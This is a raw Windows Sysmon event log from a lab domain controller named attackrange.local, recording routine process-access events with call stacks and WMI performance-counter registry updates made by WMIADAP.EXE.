Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:49.938{59A5CD1D-8F2D-6005-F100-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:58.954{59A5CD1D-8E46-6005-1600-00000000A301}15442100C:\Windows\system32\svchost.exe{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7d87d|C:\Windows\SYSTEM32\ntdll.dll+3a979|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:37:58.641{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x2261b5e6) 12241200x80000000000000004468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000004467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List25560 25566 25576 25586 25606 25650 25660 25698 25704 25720 13241300x80000000000000004466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x000063d9) 13241300x80000000000000004465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x000063d8) 13241300x80000000000000004464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x0000647f) 13241300x80000000000000004463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x0000647e) 13241300x80000000000000004462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x0000647f) 13241300x80000000000000004461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x0000647e) 13241300x80000000000000004460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000004459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 12241200x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 12241200x80000000000000004457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List 12241200x80000000000000004456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Help 12241200x80000000000000004455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Help 12241200x80000000000000004454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter 12241200x80000000000000004453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Counter 13241300x80000000000000004452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x000063d7) 13241300x80000000000000004451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x000063d6) 13241300x80000000000000004450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.001{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000004481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 13241300x80000000000000004480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000004479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\xeniface.sys[XENIFACEMOF]LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully 13241300x80000000000000004478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000004476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 13241300x80000000000000004474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:1470350432,HighDateTime:30846383***Binary mof compiled successfully 13241300x80000000000000004471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:-1965991328,HighDateTime:30841156***Binary mof compiled successfully 12241200x80000000000000004470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000004469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 10341000x80000000000000004483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:18.377{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 